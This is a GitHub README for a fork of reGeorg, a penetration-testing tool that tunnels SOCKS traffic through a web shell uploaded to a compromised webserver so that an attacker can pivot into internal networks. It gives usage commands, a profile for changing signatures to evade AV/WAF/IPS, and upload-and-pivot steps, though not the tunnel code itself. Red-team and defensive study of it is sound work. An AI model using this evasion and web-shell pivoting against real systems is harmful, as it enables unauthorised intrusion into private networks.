Skip to content
/ reGeorg Public
forked from sensepost/reGeorg

The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

License

Unknown, Unknown licenses found

Licenses found

Unknown
LICENSE.html
Unknown
LICENSE.txt
3 stars 822 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

joda32/reGeorg

BranchesTags
 
 

Repository files navigation

reGeorg

  _____   ______  __|___  |__  ______  _____  _____   ______
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |
 |__|\__\|______||______|  __||______|\_____/|__|\__\|______|
                    |_____|
                    ... every office needs a tool like Georg

willem.mouton@gmail.com / @_w_m__

Version

1.1

Dependencies

reGeorg requires Python 3.x and the following modules:

  • urllib3 - HTTP library with thread-safe connection pooling, file post, and more.

Usage

$ usage: 

$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] [-u] [-v] [-f] [-g]

Socks server for reGeorg HTTP(s) tunneller

options:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]
  -f , --profile       Profile file containing, create one else you are going be in AV hell
  -g , --generate      Template to generate shell from
  • Step 1. Generate a tunnel (This is new)

First modify the values in reGeorgSocksProxy.py

profile = {
"SESSIONVAR_NAME": "simons-session",
"CMD_CONNECT": "plus",
"CMD_DISCONNECT": "like",
"CMD_FORWARD": "review",
"CMD_READ": "link",
"CMD_GET_PARAM": "option",
"CMD_GET_TARGET": "source",
"CMD_GET_PORT": "id",

"RESP_HEADER_CODE": "X-RC",
"RESP_HEADER_MESSAGE": "X-MSG",
"RESP_CODE_OK": "AYE",
"RESP_CODE_FAIL": "OEFT",

"BASICCHECKSTRING": "Good Morning Simon!"
}

This will change the network/file signature of both the traffic as well as the tunnel file. Helping you avoid AV/WAF/IPS.

Generate a new tunnel.(aspx|ashx|jsp) (php is comming, still testing it a bit)

python3 reGeorgSocksProxy.py -g

Example

python3 reGeorgSocksProxy.py -g templates/tunnel.aspx

This will create gen_tunnel.(aspx|ashx|jsp)

  • Step 2. Upload gen_tunnel.(aspx|ashx|jsp|php) to a webserver (How you do that is up to you)

  • Step 3. Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py

** Note, if you tools, such as NMap doesn't support socks proxies, use proxychains (see wiki)

  • Step 4. Hack the planet :)

Example

$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp

License

MIT

About

The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Resources

Readme

License

Unknown, Unknown licenses found

Licenses found

Unknown
LICENSE.html
Unknown
LICENSE.txt
Activity

Stars

3 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 37.5%
  • PHP 20.7%
  • ASP.NET 16.0%
  • Java 15.3%
  • JavaScript 10.5%